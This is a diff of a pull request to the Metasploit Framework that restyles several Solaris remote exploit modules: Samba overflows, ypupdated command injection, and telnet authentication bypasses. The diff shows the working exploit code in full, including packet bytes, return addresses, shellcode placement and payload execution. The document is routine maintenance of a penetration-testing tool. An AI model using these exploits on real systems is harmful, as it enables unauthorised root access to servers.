+          versions 3.0.21-3.0.24. Additionally, this module will not work
+          when the Samba "log level" parameter is higher than "2".
+        },
+        'Author' => [
           'Ramon de C Valle',
           'Adriano Lima <adriano[at]risesecurity.org>',
           'hdm'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2007-2446'],
           ['OSVDB', '34699'],
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 1024
         },
-      'Platform'       => 'solaris',
-      'Targets'        =>
-        [
-          ['Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
-          {
-            'Platform'      => 'solaris',
-            'Arch'          => [ ARCH_X86 ],
-            'Nops'          => 64 * 1024,
-            'Bruteforce' =>
-              {
-                'Start' => { 'Ret' => 0x082f2000 },
-                'Stop'  => { 'Ret' => 0x084f2000 },
-                'Step'  => 60 * 1024,
-              }
-          }
+        'Platform' => 'solaris',
+        'Targets' => [
+          [
+            'Solaris 8/9/10 x86 Samba 3.0.21-3.0.24',
+            {
+              'Platform' => 'solaris',
+              'Arch' => [ ARCH_X86 ],
+              'Nops' => 64 * 1024,
+              'Bruteforce' =>
+                {
+                  'Start' => { 'Ret' => 0x082f2000 },
+                  'Stop' => { 'Ret' => 0x084f2000 },
+                  'Step' => 60 * 1024
+                }
+            }
           ],
-          ['Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
-          {
-            'Platform'      => 'solaris',
-            'Arch'          => [ ARCH_SPARC ],
-            'Nops'          => 64 * 1024,
-            'Bruteforce' =>
-              {
-                'Start' => { 'Ret' => 0x00322000 },
-                'Stop'  => { 'Ret' => 0x00722000 },
-                'Step'  => 60 * 1024,
-              }
-          }
+          [
+            'Solaris 8/9/10 SPARC Samba 3.0.21-3.0.24',
+            {
+              'Platform' => 'solaris',
+              'Arch' => [ ARCH_SPARC ],
+              'Nops' => 64 * 1024,
+              'Bruteforce' =>
+                {
+                  'Start' => { 'Ret' => 0x00322000 },
+                  'Stop' => { 'Ret' => 0x00722000 },
+                  'Step' => 60 * 1024
+                }
+            }
           ],
-          ['DEBUG',
-          {
-            'Platform'      => 'solaris',
-            'Arch'          => [ ARCH_X86 ],
-            'Nops'          => 64 * 1024,
-            'Bruteforce' =>
-              {
-                'Start' => { 'Ret' => 0xaabbccdd },
-                'Stop'  => { 'Ret' => 0xaabbccdd },
-                'Step'  => 60 * 1024,
-              }
-          }
+          [
+            'DEBUG',
+            {
+              'Platform' => 'solaris',
+              'Arch' => [ ARCH_X86 ],
+              'Nops' => 64 * 1024,
+              'Bruteforce' =>
+                {
+                  'Start' => { 'Ret' => 0xaabbccdd },
+                  'Stop' => { 'Ret' => 0xaabbccdd },
+                  'Step' => 60 * 1024
+                }
+            }
           ],
         ],
-      'DisclosureDate' => '2007-05-14',
-      'DefaultTarget'  => 0
-      ))
+        'DisclosureDate' => '2007-05-14',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_RESTARTS],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
-    register_options(
-      [
-        OptString.new('SMBPIPE', [ true,  "The pipe name to use", 'LSARPC']),
-      ])
+    register_options([
+      OptString.new('SMBPIPE', [true, 'The pipe name to use', 'LSARPC']),
+    ])
 
+    deregister_options('DCERPC::fake_bind_multi')
   end
 
   # Need to perform target detection
@@ -97,24 +104,23 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def brute_exploit(target_addrs)
-
-    if(not @nops)
+    if !@nops
       if (target['Nops'] > 0)
-        print_status("Creating nop sled....")
+        print_status('Creating nop sled....')
         @nops = make_nops(target['Nops'])
       else
         @nops = ''
       end
     end
 
-    print_status("Trying to exploit Samba with address 0x%.8x..." % target_addrs['Ret'])
+    print_status('Trying to exploit Samba with address 0x%.8x...' % target_addrs['Ret'])
 
     nops = @nops
     pipe = datastore['SMBPIPE'].downcase
 
-    print_status("Connecting to the SMB service...")
-    connect()
-    smb_login()
+    print_status('Connecting to the SMB service...')
+    connect
+    smb_login
 
     datastore['DCERPC::fake_bind_multi'] = false
 
@@ -123,7 +129,7 @@ class MetasploitModule < Msf::Exploit::Remote
     dcerpc_bind(handle)
     print_status("Bound to #{handle} ...")
 
-    num_entries  = 272
+    num_entries = 272
     num_entries2 = 288
 
     #
@@ -163,7 +169,7 @@ class MetasploitModule < Msf::Exploit::Remote
     stub << nops
     stub << payload.encoded
 
-    print_status("Calling the vulnerable function...")
+    print_status('Calling the vulnerable function...')
 
     begin
       # LsarLookupSids
@@ -172,7 +178,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status('Server did not respond, this is expected')
     rescue Rex::Proto::DCERPC::Exceptions::Fault
       print_error('Server is most likely patched...')
-    rescue => e
+    rescue StandardError => e
       if e.to_s =~ /STATUS_PIPE_DISCONNECTED/
         print_status('Server disconnected, this is expected')
       else
@@ -184,29 +190,27 @@ class MetasploitModule < Msf::Exploit::Remote
     disconnect
   end
 
-  def lsa_open_policy(dcerpc, server="\\")
+  def lsa_open_policy(dcerpc, server = '\\')
     stubdata =
       # Server
       NDR.uwstring(server) +
       # Object Attributes
-        NDR.long(24) + # SIZE
-        NDR.long(0)  + # LSPTR
-        NDR.long(0)  + # NAME
-        NDR.long(0)  + # ATTRS
-        NDR.long(0)  + # SEC DES
-          # LSA QOS PTR
-          NDR.long(1)  + # Referent
-          NDR.long(12) + # Length
-          NDR.long(2)  + # Impersonation
-          NDR.long(1)  + # Context Tracking
-          NDR.long(0)  + # Effective Only
+      NDR.long(24) + # SIZE
+      NDR.long(0) + # LSPTR
+      NDR.long(0) + # NAME
+      NDR.long(0) + # ATTRS
+      NDR.long(0) + # SEC DES
+      # LSA QOS PTR
+      NDR.long(1) + # Referent
+      NDR.long(12) + # Length
+      NDR.long(2) + # Impersonation
+      NDR.long(1) + # Context Tracking
+      NDR.long(0) + # Effective Only
       # Access Mask
       NDR.long(0x02000000)
 
-    res = dcerpc.call(6, stubdata)
+    dcerpc.call(6, stubdata)
 
-    dcerpc.last_response.stub_data[0,20]
+    dcerpc.last_response.stub_data[0, 20]
   end
-
-
 end

--- a/modules/exploits/solaris/samba/trans2open.rb
+++ b/modules/exploits/solaris/samba/trans2open.rb
@@ -10,152 +10,153 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Brute
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Samba trans2open Overflow (Solaris SPARC)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Samba trans2open Overflow (Solaris SPARC)',
+        'Description' => %q{
           This exploits the buffer overflow found in Samba versions
-        2.2.0 to 2.2.8. This particular module is capable of
-        exploiting the flaw on Solaris SPARC systems that do not
-        have the noexec stack option set. Big thanks to MC and
-        valsmith for resolving a problem with the beta version of
-        this module.
-      },
-      'Author'         => [ 'hdm', 'jduck' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          2.2.0 to 2.2.8. This particular module is capable of
+          exploiting the flaw on Solaris SPARC systems that do not
+          have the noexec stack option set. Big thanks to MC and
+          valsmith for resolving a problem with the beta version of
+          this module.
+        },
+        'Author' => [ 'hdm', 'jduck' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2003-0201' ],
           [ 'OSVDB', '4469' ],
           [ 'BID', '7294' ],
           [ 'URL', 'https://seclists.org/bugtraq/2003/Apr/103' ]
         ],
-      'Privileged'     => true,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Payload' => {
+          'Space' => 1024,
           'BadChars' => "\x00",
-          'MinNops'  => 512,
+          'MinNops' => 512
         },
-      'Platform'       => 'solaris',
-      'Targets'        =>
-        [
-          [ 'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
+        'Platform' => 'solaris',
+        'Targets' => [
+          [
+            'Samba 2.2.x - Solaris 9 (sun4u) - Bruteforce',
             {
               'PtrToNonZero' => 0xffbffffc, # near the bottom of the stack
-              'Offset'       => 1103,
-              'Bruteforce'   =>
+              'Offset' => 1103,
+              'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xffbffaf0 },
-                  'Stop'  => { 'Ret' => 0xffbfa000 },
-                  'Step'  => 128
+                  'Stop' => { 'Ret' => 0xffbfa000 },
+                  'Step' => 128
                 }
             }
           ],
-
-          [ 'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
+          [
+            'Samba 2.2.x - Solaris 7/8 (sun4u) - Bruteforce',
             {
               'PtrToNonZero' => 0xffbefffc, # near the bottom of the stack
-              'Offset'       => 1103,
-              'Bruteforce'   =>
+              'Offset' => 1103,
+              'Bruteforce' =>
                 {
                   'Start' => { 'Ret' => 0xffbefaf0 },
-                  'Stop'  => { 'Ret' => 0xffbea000 },
-                  'Step'  => 128
+                  'Stop' => { 'Ret' => 0xffbea000 },
+                  'Step' => 128
                 }
             }
           ]
         ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '2003-04-07'
-      ))
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2003-04-07',
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_RESTARTS, ],
+          'Reliability' => [ REPEATABLE_SESSION, ],
+          'SideEffects' => [ IOC_IN_LOGS, ]
+        }
+      )
+    )
 
-    register_options(
-      [
-        Opt::RPORT(139)
-      ])
+    register_options([
+      Opt::RPORT(139)
+    ])
 
     deregister_options('SMB::ProtocolVersion')
   end
 
   def brute_exploit(addrs)
-
     curr_ret = addrs['Ret']
-    begin
-      print_status("Trying return address 0x%.8x..." %  curr_ret)
+    print_status('Trying return address 0x%.8x...' % curr_ret)
 
-      connect(versions: [1])
-      smb_login
+    connect(versions: [1])
+    smb_login
 
-      #
-      # The obstacle course:
-      # 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
-      # 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
-      # 	return(outsize);
-      #
+    #
+    # The obstacle course:
+    # 	outsize = smb_messages[type].fn(conn, inbuf,outbuf,size,bufsize);
+    # 	smb_dump(smb_fn_name(type), 0, outbuf, outsize);
+    # 	return(outsize);
+    #
 
-      # This value *must* be 1988 to allow findrecv shellcode to work
-      pattern = rand_text_english(1988)
+    # This value *must* be 1988 to allow findrecv shellcode to work
+    pattern = rand_text_english(1988)
 
-      #
-      # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
-      #
-      # Patch the overwritten heap pointers
-      # substr($pattern, 1159, 4, pack('N', $target->[4]));
-      # substr($pattern, 1163, 4, pack('N', $target->[4]));
-      #
-      # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
-      # substr($pattern, 1195, 4, pack('N', 0xffffffff));
-      #
-      # Fix the frame pointer (need to check for null in address)
-      # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
-      #
-      # Finally set the return address
-      # substr($pattern, 1247, 4, pack('N', $curr_ret));
-      #
+    #
+    # This was tested against sunfreeware samba 2.2.7a / solaris 9 / sun4u
+    #
+    # Patch the overwritten heap pointers
+    # substr($pattern, 1159, 4, pack('N', $target->[4]));
+    # substr($pattern, 1163, 4, pack('N', $target->[4]));
+    #
+    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
+    # substr($pattern, 1195, 4, pack('N', 0xffffffff));
+    #
+    # Fix the frame pointer (need to check for null in address)
+    # substr($pattern, 1243, 4, pack('N', $target->[3]-64));
+    #
+    # Finally set the return address
+    # substr($pattern, 1247, 4, pack('N', $curr_ret));
+    #
 
-      #
-      # This method is more reliable against a wider range of targets
-      #
+    #
+    # This method is more reliable against a wider range of targets
+    #
 
-      off = target['Offset']
-      ptr_to_non_zero = target['PtrToNonZero']
+    off = target['Offset']
+    ptr_to_non_zero = target['PtrToNonZero']
 
-      # Local variable pointer patches for early versions of 2.2.x
-      pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
-      off += 36
+    # Local variable pointer patches for early versions of 2.2.x
+    pattern[off, 36] = [ptr_to_non_zero - 1024].pack('N') * 9
+    off += 36
 
-      # Overwrite heap pointers with a ptr to NULL at the top of the stack
-      pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
-      off += 40
+    # Overwrite heap pointers with a ptr to NULL at the top of the stack
+    pattern[off, 40] = [ptr_to_non_zero - 1024].pack('N') * 10
+    off += 40
 
-      # Patch the type index into the smb_messages[] array...
-      # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
-      pattern[off, 20] = [0xffffffff].pack('N') * 5
-      off += 20
+    # Patch the type index into the smb_messages[] array...
+    # >:-) smb_messages[ (((type << 1) + type) << 2) ] == 0
+    pattern[off, 20] = [0xffffffff].pack('N') * 5
+    off += 20
 
-      # This stream covers the framepointer and the return address
-      pattern[off, 400] = [curr_ret].pack('N') * 100
+    # This stream covers the framepointer and the return address
+    pattern[off, 400] = [curr_ret].pack('N') * 100
 
-      # Stuff the shellcode into the request
-      pattern[3, payload.encoded.length] = payload.encoded
+    # Stuff the shellcode into the request
+    pattern[3, payload.encoded.length] = payload.encoded
 
-      trans =
-        "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"+
-        "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+
-        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90"+
-        pattern
+    trans =
+      "\x00\x04\x08\x20\xff\x53\x4d\x42\x32\x00\x00\x00\x00\x00\x00\x00" \
+      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00" \
+      "\x64\x00\x00\x00\x00\xd0\x07\x0c\x00\xd0\x07\x0c\x00\x00\x00\x00" \
+      "\x00\x00\x00\x00\x00\x00\x00\xd0\x07\x43\x00\x0c\x00\x14\x08\x01" \
+      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \
+      "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90" +
+      pattern
 
-      sock.put(trans)
-      handler
-      disconnect
-
-    rescue EOFError
-    rescue => e
-      print_error("#{e}")
-    end
-
+    sock.put(trans)
+    handler
+    disconnect
+  rescue EOFError
+    print_error(e.to_s)
+  rescue StandardError => e
+    print_error(e.to_s)
   end
 end

--- a/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
+++ b/modules/exploits/solaris/sunrpc/ypupdated_exec.rb
@@ -3,67 +3,71 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
+require 'English'
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::SunRPC
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris ypupdated Command Execution',
-      'Description'    => %q{
-        This exploit targets a weakness in the way the ypupdated RPC
-        application uses the command shell when handling a MAP UPDATE
-        request.  Extra commands may be launched through this command
-        shell, which runs as root on the remote host, by passing
-        commands in the format '|<command>'.
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris ypupdated Command Execution',
+        'Description' => %q{
+          This exploit targets a weakness in the way the ypupdated RPC
+          application uses the command shell when handling a MAP UPDATE
+          request.  Extra commands may be launched through this command
+          shell, which runs as root on the remote host, by passing
+          commands in the format '|<command>'.
 
-        Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
-        ypupdated is started with the '-i' command-line option.
-      },
-      'Author'         => [ 'I)ruid <druid[at]caughq.org>' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+          Vulnerable systems include Solaris 2.7, 8, 9, and 10, when
+          ypupdated is started with the '-i' command-line option.
+        },
+        'Author' => [ 'I)ruid <druid[at]caughq.org>' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '1999-0209'],
           ['OSVDB', '11517'],
           ['BID', '1749'],
         ],
-      'Privileged'     => true,
-      'Platform'       => %w{ solaris unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'    => 1024,
+        'Privileged' => true,
+        'Platform' => %w[solaris unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 1024,
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
         },
-      'Targets'        => [ ['Automatic', { }], ],
-      'DefaultTarget'  => 0,
-      'DisclosureDate' => '1994-12-12'
-    ))
-
-    register_options(
-      [
-        OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
-        OptInt.new('GID', [false, 'GID to emulate', 0]),
-        OptInt.new('UID', [false, 'UID to emulate', 0])
-      ], self.class
+        'Targets' => [ ['Automatic', {}], ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '1994-12-12',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
     )
+
+    register_options([
+      OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']),
+      OptInt.new('GID', [false, 'GID to emulate', 0]),
+      OptInt.new('UID', [false, 'UID to emulate', 0])
+    ])
   end
 
   def exploit
-    hostname  = datastore['HOSTNAME']
-    program   = 100028
-    progver   = 1
+    hostname = datastore['HOSTNAME']
+    program = 100028
+    progver = 1
     procedure = 1
 
     print_status('Sending PortMap request for ypupdated program')
-    pport = sunrpc_create('udp', program, progver)
+    sunrpc_create('udp', program, progver)
 
     print_status("Sending MAP UPDATE request with command '#{payload.encoded}'")
     print_status('Waiting for response...')
@@ -76,6 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('No Errors, appears to have succeeded!')
   rescue ::Rex::Proto::SunRPC::RPCTimeout
-    print_warning('Warning: ' + $!)
+    print_warning('Warning: ' + $ERROR_INFO)
   end
 end

--- a/modules/exploits/solaris/telnet/fuser.rb
+++ b/modules/exploits/solaris/telnet/fuser.rb
@@ -9,46 +9,50 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
-      'Description'    => %q{
-        This module exploits the argument injection vulnerability
-        in the telnet daemon (in.telnetd) of Solaris 10 and 11.
-      },
-      'Author'         => [ 'MC' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Sun Solaris Telnet Remote Authentication Bypass Vulnerability',
+        'Description' => %q{
+          This module exploits the argument injection vulnerability
+          in the telnet daemon (in.telnetd) of Solaris 10 and 11.
+        },
+        'Author' => [ 'MC' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2007-0882' ],
           [ 'OSVDB', '31881'],
           [ 'BID', '22512' ],
         ],
-      'Privileged'     => false,
-      'Platform'       => %w{ solaris unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'    => 2000,
+        'Privileged' => false,
+        'Platform' => %w[solaris unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 2000,
           'BadChars' => '',
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
         },
-      'Targets'        =>
-        [
-          ['Automatic', { }],
+        'Targets' => [
+          ['Automatic', {}],
         ],
-      'DisclosureDate' => '2007-02-12',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2007-02-12',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(23),
-          OptString.new('USER', [ true, "The username to use",     "bin" ]),
-        ])
+    register_options([
+      Opt::RPORT(23),
+      OptString.new('USER', [ true, 'The username to use', 'bin' ]),
+    ])
   end
 
   def exploit
@@ -56,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status('Setting USER environment variable...')
 
-    req =  "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
+    req = "\xFF\xFD\x26\xFF\xFB\x26\xFF\xFD\x03\xFF\xFB"
     req << "\x18\xFF\xFB\x1F\xFF\xFB\x20\xFF\xFB\x21\xFF"
     req << "\xFB\x22\xFF\xFB\x27\xFF\xFD\x05"
 
@@ -83,17 +87,17 @@ class MetasploitModule < Msf::Exploit::Remote
     sock.put(req)
     sock.get_once
 
-    req =  "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"
+    req = "\xFF\xFA\x18\x00\x58\x54\x45\x52\x4D\xFF"
     req << "\xF0\xFF\xFA\x27\x00\x00\x55\x53\x45\x52"
     req << "\x01\x2D\x66" + datastore['USER'] + "\xFF\xF0"
 
     sock.put(req)
     sock.get_once
-    select(nil,nil,nil,0.25)
+    select(nil, nil, nil, 0.25)
 
-    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
+    sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")
 
-    select(nil,nil,nil,0.25)
+    select(nil, nil, nil, 0.25)
 
     handler
   end

--- a/modules/exploits/solaris/telnet/ttyprompt.rb
+++ b/modules/exploits/solaris/telnet/ttyprompt.rb
@@ -9,88 +9,91 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
-      'Description'    => %q{
-        This module uses a buffer overflow in the Solaris 'login'
-      application to bypass authentication in the telnet daemon.
-      },
-      'Author'         => [ 'MC', 'cazz' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
-          [ 'CVE', '2001-0797'],
-          [ 'OSVDB', '690'],
-          [ 'BID', '5531'],
-
+    super(
+      update_info(
+        info,
+        'Name' => 'Solaris in.telnetd TTYPROMPT Buffer Overflow',
+        'Description' => %q{
+          This module uses a buffer overflow in the Solaris 'login'
+          application to bypass authentication in the telnet daemon.
+        },
+        'Author' => [ 'MC', 'cazz' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2001-0797'],
+          ['OSVDB', '690'],
+          ['BID', '5531'],
         ],
-      'Privileged'     => false,
-      'Platform'       => %w{ solaris unix },
-      'Arch'           => ARCH_CMD,
-      'Payload'        =>
-        {
-          'Space'    => 2000,
+        'Privileged' => false,
+        'Platform' => %w[solaris unix],
+        'Arch' => ARCH_CMD,
+        'Payload' => {
+          'Space' => 2000,
           'BadChars' => '',
           'DisableNops' => true,
-          'Compat'      =>
-            {
-              'PayloadType' => 'cmd',
-              'RequiredCmd' => 'generic perl telnet',
-            }
+          'Compat' => {
+            'PayloadType' => 'cmd',
+            'RequiredCmd' => 'generic perl telnet'
+          }
         },
-      'Targets'        =>
-        [
-          ['Automatic', { }],
+        'Targets' => [
+          ['Automatic', {}],
         ],
-      'DisclosureDate' => '2002-01-18',
-      'DefaultTarget' => 0))
+        'DisclosureDate' => '2002-01-18',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
 
-      register_options(
-        [
-          Opt::RPORT(23),
-          OptString.new('USER', [ true, "The username to use",     "bin" ]),
-        ])
+    register_options([
+      Opt::RPORT(23),
+      OptString.new('USER', [ true, 'The username to use', 'bin' ]),
+    ])
   end
 
   def exploit
     connect
 
-    banner = sock.get_once
+    _banner = sock.get_once
 
     print_status('Setting TTYPROMPT...')
 
     req =
-      "\xff\xfc\x18" +
-      "\xff\xfc\x1f" +
-      "\xff\xfc\x21" +
-      "\xff\xfc\x23" +
-      "\xff\xfb\x22" +
-      "\xff\xfc\x24" +
-      "\xff\xfb\x27" +
-      "\xff\xfb\x00" +
-      "\xff\xfa\x27\x00" +
-      "\x00TTYPROMPT" +
+      "\xff\xfc\x18" \
+      "\xff\xfc\x1f" \
+      "\xff\xfc\x21" \
+      "\xff\xfc\x23" \
+      "\xff\xfb\x22" \
+      "\xff\xfc\x24" \
+      "\xff\xfb\x27" \
+      "\xff\xfb\x00" \
+      "\xff\xfa\x27\x00" \
+      "\x00TTYPROMPT" \
       "\x01" +
       rand_text_alphanumeric(6) +
       "\xff\xf0"
 
     sock.put(req)
-    select(nil,nil,nil,0.25)
+    select(nil, nil, nil, 0.25)
 
     print_status('Sending username...')
 
-    filler = rand_text_alpha(rand(10) + 1)
+    filler = rand_text_alpha(1..10)
 
     req << datastore['USER'] + (" #{filler}" * 65)
 
     sock.put(req + "\n\n\n")
 
-    select(nil,nil,nil,0.25)
+    select(nil, nil, nil, 0.25)
     sock.get_once
 
-    sock.put("nohup " + payload.encoded + " >/dev/null 2>&1\n")
+    sock.put("nohup #{payload.encoded} >/dev/null 2>&1\n")
 
-    select(nil,nil,nil,0.25)
+    select(nil, nil, nil, 0.25)
 
     handler
   end


### PR DESCRIPTION
Most violations were resolved with `rubocop -A`, except notes.

The RSH stack clash module needs some work to move the C source into a standalone file in `external/`, but this is outside the scope of this PR.